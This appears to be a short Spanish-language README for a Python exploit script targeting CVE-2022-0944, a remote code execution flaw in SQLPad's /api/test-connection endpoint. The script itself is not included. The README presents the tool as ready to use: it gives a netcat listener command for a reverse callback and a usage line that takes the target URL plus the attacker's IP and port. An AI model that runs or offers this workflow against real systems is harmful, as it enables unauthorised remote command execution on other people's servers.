
Exploit en Python para CVE-2022-0944 que permite la ejecución remota de código a ciegas en SQLPad a través del endpoint /api/test-connection con callback de netcat.
Este repositorio contiene un script de explotación para CVE-2022-0944 en SQLPad, una vulnerabilidad que permite la ejecución remota de código (RCE) a través del endpoint /api/test-connection.
El script proporcionado (exploit.py) demuestra cómo explotar la vulnerabilidad RCE en SQLPad. El script envía un payload al endpoint vulnerable, ejecutando un comando en el servidor objetivo.
requests (se puede instalar mediante pip)nc -lvnp 4444
Ejecutar el Exploit
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>